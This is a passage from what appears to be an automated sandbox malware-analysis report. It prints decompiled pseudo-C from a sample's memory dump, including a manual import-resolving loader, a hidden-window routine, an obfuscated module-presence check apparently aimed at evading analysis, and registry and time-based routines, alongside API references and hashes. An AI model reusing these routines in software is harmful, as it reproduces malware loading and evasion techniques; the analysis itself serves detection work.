								_t92 =  *0xde68c; // 0x27bfab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E000CC392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E000CB1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xde68c; // 0x27bfab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000c61b4
0x000c61b4
0x000c61c0
0x000c61cf
0x000c61d2
0x000c61dc
0x000c61e4
0x000c61e7
0x000c61ea
0x000c61ef
0x000c61f1
0x000c61f4
0x000c61f9
0x000c6365
0x000c6369
0x000c6369
0x000c6209
0x000c620b
0x000c6211
0x00000000
0x00000000
0x000c6234
0x000c6333
0x000c6337
0x000c6341
0x000c6341
0x000c634d
0x000c635b
0x00000000
0x000c6360
0x000c623d
0x000c6241
0x000c6245
0x000c6249
0x000c624d
0x000c624e
0x000c624f
0x000c6250
0x000c6251
0x000c6255
0x000c625c
0x000c625d
0x000c6262
0x000c626d
0x000c6282
0x000c6284
0x00000000
0x00000000
0x000c628a
0x000c628d
0x000c6295
0x000c62a2
0x000c62a7
0x000c62aa
0x000c62b3
0x000c62ba
0x000c62ca
0x000c62d4
0x000c62da
0x000c62dc
0x000c62e1
0x000c62ea
0x000c62ec
0x000c62ee
0x000c62f0
0x000c62fa
0x000c6300
0x000c6304
0x000c6308
0x000c630d
0x000c6313
0x000c6315
0x000c6317
0x000c6317
0x000c631e
0x000c631e
0x000c6304
0x000c6323
0x000c6323
0x000c6326
0x000c6327
0x000c632a
0x000c632a
0x00000000
0x000c628d
0x000c626f
0x000c6277
0x00000000

APIs

memset.MSVCRT ref: 000C61D2

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
memset.MSVCRT ref: 000C6295
memset.MSVCRT ref: 000C62A2
RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 000C6341

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: memset$AllocateCloseHeapOpen
String ID:
API String ID: 1886988140-0
Opcode ID: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
Opcode Fuzzy Hash: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65

Uniqueness

Uniqueness Score: -1.00%

Function 000CCF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000CCF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xde688; // 0xf0000
				GetCurrentProcess();
				_t11 = E000CBA05(); // executed
				_t1 = _t29 + 0x1644; // 0xf1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E000C8FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xf0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E000CE3B6(_t3);
				_t7 = _t29 + 0x220; // 0xf0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E000CE3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x000ccf87
0x000ccf89
0x000ccf90
0x000ccf98
0x000ccfa2
0x000ccfa2
0x000ccfa8
0x000ccfb1
0x000ccfb7
0x000ccfb9
0x000ccfbd
0x000ccfbd
0x000ccfc2
0x000ccfc8
0x000ccfd8
0x000ccfe2
0x000ccfea
0x000ccfed
0x000ccff9
0x000ccfff
0x000cd004
0x000cd00a
0x000cd010
0x000cd016
0x000cd01e

APIs

GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
memset.MSVCRT ref: 000CCFE2
GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64

Uniqueness

Uniqueness Score: -1.00%

Function 000D249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E000D249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E000CE099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000d24a1
0x000d24a9
0x000d24be
0x000d24d0
0x000d24dc
0x000d24e2
0x000d24e7
0x000d24f3
0x000d265e
0x00000000
0x000d265e
0x000d24f9
0x000d2502
0x000d2510
0x000d2513
0x000d2522
0x000d2522
0x000d2529
0x000d2537
0x000d253a
0x000d2551
0x000d2557
0x000d255e
0x000d256e
0x000d2586
0x000d2570
0x000d2578
0x000d2578
0x000d2589
0x000d258d
0x000d2599
0x000d259d
0x000d25a1
0x000d25a5
0x000d25b1
0x000d25dc
0x000d25e4
0x000d25f6
0x000d2602
0x000d25b3
0x000d25b8
0x000d25c3
0x000d25cf
0x000d25cf
0x000d260b
0x000d2611
0x000d261b
0x000d2637
0x000d261d
0x000d262c
0x000d262c
0x000d261b
0x000d263f
0x000d2648
0x000d2648
0x000d2656
0x00000000
0x000d2656
0x000d2562
0x00000000
0x000d2562
0x00000000
0x000d253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
LoadLibraryA.KERNEL32(00000000), ref: 000D2551

Strings

GetProcAddress, xrefs: 000D24C1
kernel32.dll, xrefs: 000D24B3

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60

Uniqueness

Uniqueness Score: -1.00%

Function 000C2EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E000C2EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0xde684; // 0x27bf8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0xde688; // 0xf0000
				E000C902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E000C2E77;
				_push( &_v52);
				_t32 =  *0xde694; // 0x27bfa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0xde718; // 0x6029a
					if(_t34 != 0) {
						_t39 =  *0xde694; // 0x27bfa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0xde694; // 0x27bfa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0xde718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0xde694; // 0x27bfa48
				 *((intOrPtr*)(_t47 + 0x18))( *0xde718);
				while(1) {
					_t50 =  *0xde694; // 0x27bfa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0xde694; // 0x27bfa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0xde694; // 0x27bfa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x000c2ee3
0x000c2ef2
0x000c2ef9
0x000c2efe
0x000c2f18
0x000c2f20
0x000c2f2d
0x000c2f34
0x000c2f3a
0x000c2f41
0x000c2f42
0x000c2f47
0x000c2f50
0x000c2fcd
0x000c2fcd
0x000c2fd4
0x000c2fd7
0x000c2fdc
0x000c2fdc
0x000c2fdf
0x000c2fe7
0x000c2fec
0x000c2ff4
0x000c2ff4
0x000c2f77
0x000c2f7a
0x000c2f81
0x00000000
0x00000000
0x000c2f8a
0x000c2f8d
0x000c2f98
0x000c2fba
0x000c2fc1
0x000c2fc6
0x000c2fcb
0x00000000
0x00000000
0x000c2fa0
0x00000000
0x00000000
0x000c2fa6
0x000c2fab
0x000c2fb2
0x000c2fb7
0x000c2fb7
0x00000000

APIs

memset.MSVCRT ref: 000C2EF9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000C2F77
ShowWindow.USER32(00000000,00000000), ref: 000C2F8A

Strings

0, xrefs: 000C2F2D

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
Instruction ID: a9f914c0b4fadeb3d72a178da7fd84f66818822a173e8fe5a0fe974533a9003f
Opcode Fuzzy Hash: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
Instruction Fuzzy Hash: ED31F5B1501218AFF750EF68DC89FAA7BBCEB18344F00406AB909DB262D634DD058B71

Uniqueness

Uniqueness Score: -1.00%

Function 000C4D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0xde688; // 0xf0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E000CB7A8(0xdb9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E000CA86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E000CA471( &_v556, _t298);
					 *0xde748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E000CE1BC(0xdb9cc, _t299); // executed
						 *0xde680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000C95E1(0xdb9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0xde688; // 0xf0000
						_t127 = E000C92E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000C85D5( &_v612);
						_t130 = E000CB269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E000C861A( &_v616, 0xfffffffe);
						_t133 =  *0xde688; // 0xf0000
						_t22 = _t133 + 0x114; // 0xf0114
						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xde688; // 0xf0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xde680; // 0x27bfdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E000CE2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0xde6b4; // 0x27bfa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E000CE2C6(_t353,  &_v588);
								_t235 =  *0xde6b4; // 0x27bfa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xde73c;
							if( *0xde73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xde680; // 0x27bfdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xde688; // 0xf0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000C49A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xde684; // 0x27bf8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xde688; // 0xf0000
											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E000C8604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E000C109A(_t262, 0x148);
													_t305 =  *0xde688; // 0xf0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E000C902D(_t271,  &_v572);
													_t272 =  *0xde688; // 0xf0000
													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xde688; // 0xf0000
														__eflags = _t200 + 0x1020;
														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000C85D5( &_v636);
														E000CA911(_t333, 0, 0xbb8, 1); // executed
														E000C861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E000C861A( &_v616, 0xfffffffe); // executed
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000C49A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xde684; // 0x27bf8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E000C8604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000C95E1(_t278, 0x32d);
										_t280 =  *0xde688; // 0xf0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000C85D5( &_v636);
										E000CA911(_t249, 0, 0xbb8, 1);
										E000C861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000C95E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0xde688; // 0xf0000
								_t329 = E000C92E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E000CB269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0xde684; // 0x27bf8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E000C861A( &_v612, 0xfffffffe);
								}
								E000C85D5( &_v616);
								_t150 =  *0xde688; // 0xf0000
								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
								_t153 =  *0xde688; // 0xf0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0xde738, 0x105);
								_t331 =  *0xde688; // 0xf0000
								_t117 = _t331 + 0x228; // 0xf0228
								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
								E000C861A(0xde740, 0xfffffffe);
								E000C861A(0xde738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000C95C7(0x6e2);
				_v616 = _t250;
				_t326 = E000C95C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000C85C2( &_v616);
					_t122 = E000C85C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x000c4d6d
0x000c4d73
0x000c4d79
0x000c4d7e
0x000c4d8c
0x000c4d8f
0x000c4dee
0x000c4df7
0x000c4e00
0x000c4e03
0x000c4e0a
0x000c4e0f
0x000c4e14
0x000c4e1b
0x000c4e25
0x000c4e2c
0x000c4e32
0x000c4e37
0x000c4e3c
0x000c4e43
0x000c4e49
0x000c4e4b
0x000c4e4c
0x000c4e50
0x000c4e5b
0x000c4e60
0x000c4e69
0x000c4e6e
0x000c4e76
0x000c4e7d
0x000c4e7e
0x000c4e80
0x000c4e9c
0x000c4e9f
0x000c4e9f
0x000c4ea8
0x000c4ead
0x000c4ebd
0x000c4ec5
0x000c4eca
0x000c4ed0
0x000c4ed3
0x000c4ed9
0x000c4ef8
0x000c4efe
0x000c4eff
0x000c4f00
0x000c4f01
0x000c4f02
0x000c4f03
0x000c4f0d
0x000c4f11
0x000c4f16
0x000c4f19
0x000c4f1b
0x000c4f2d
0x000c4f2d
0x000c4f2f
0x000c4f3b
0x000c4f40
0x000c4f46
0x000c4f4f
0x000c4f52
0x000c4f54
0x000c4f5f
0x000c4f64
0x000c4f69
0x000c4f6e
0x000c4f6e
0x000c4f71
0x000c4f78
0x00000000
0x000c4f7e
0x000c4f7e
0x000c4f83
0x000c4f87
0x000c4f89
0x000c4f8c
0x000c4f8e
0x000c4f94
0x000c4f94
0x000c4f8e
0x000c4f96
0x000c4f9b
0x000c4fa1
0x000c4fa3
0x00000000
0x000c4fa9
0x000c4fa9
0x000c4fad
0x000c5082
0x000c5088
0x000c508e
0x000c5099
0x000c509a
0x000c509b
0x000c509c
0x000c50a2
0x000c50a7
0x000c50ad
0x000c50b5
0x000c50bb
0x000c50be
0x000c50cd
0x000c50d4
0x000c50d7
0x000c50e4
0x000c50e8
0x000c50f5
0x000c50fa
0x000c50fd
0x000c50ff
0x000c5110
0x000c5112
0x000c5116
0x000c5117
0x000c5119
0x000c5124
0x000c5129
0x000c5136
0x000c513a
0x000c513b
0x000c513d
0x000c5145
0x000c5146
0x000c514b
0x000c5163
0x000c5168
0x000c516b
0x000c516f
0x000c5171
0x000c5184
0x000c518e
0x000c5192
0x000c519a
0x000c519b
0x000c51a3
0x000c51a4
0x000c51a9
0x000c51b5
0x000c51bf
0x000c51d1
0x000c51dd
0x000c51e2
0x000c51e2
0x000c51ec
0x000c51f2
0x000c51f2
0x000c5119
0x000c50ff
0x00000000
0x000c5088
0x000c4fb3
0x000c4fb6
0x00000000
0x00000000
0x000c4fbc
0x000c4fc7
0x000c4fc8
0x000c4fc9
0x000c4fca
0x000c4fd0
0x000c4fd5
0x000c4fe9
0x000c4fee
0x000c4ff2
0x000c4ffd
0x000c5006
0x000c5008
0x000c500c
0x000c500d
0x000c500f
0x000c501a
0x000c5020
0x000c5032
0x000c5035
0x000c5038
0x000c5045
0x000c504d
0x000c5057
0x000c5069
0x000c5075
0x000c507a
0x00000000
0x000c500f
0x000c4fa3
0x000c4edb
0x000c4edb
0x000c4ee1
0x000c4ee3
0x00000000
0x00000000
0x000c4ee5
0x000c4ee9
0x000c51f3
0x000c51f8
0x000c51fe
0x000c5200
0x000c5201
0x000c5205
0x000c5215
0x000c521a
0x000c521e
0x000c5220
0x000c5224
0x000c5229
0x000c522b
0x000c522d
0x000c5233
0x000c5233
0x000c5240
0x000c5246
0x000c524c
0x000c5251
0x000c526f
0x000c5271
0x000c527d
0x000c527d
0x000c5283
0x000c5285
0x000c528b
0x000c529d
0x000c52a3
0x000c52af
0x000c52b7
0x000c52b7
0x000c52b7
0x000c52b9
0x000c52bf
0x000c52bf
0x000c4eef
0x000c4ef2
0x00000000
0x00000000
0x00000000
0x000c4ef2
0x000c4ed9
0x000c4e1d
0x000c4e1d
0x00000000
0x000c4e1d
0x000c4d9b
0x000c4da2
0x000c4dab
0x000c4dad
0x000c4db3
0x000c4dc4
0x000c4dcd
0x000c4dcd
0x000c4dd9
0x000c4de2
0x000c4de7
0x000c4dec
0x00000000
0x00000000
0x000c4dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
Opcode Fuzzy Hash: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62

Uniqueness

Uniqueness Score: -1.00%

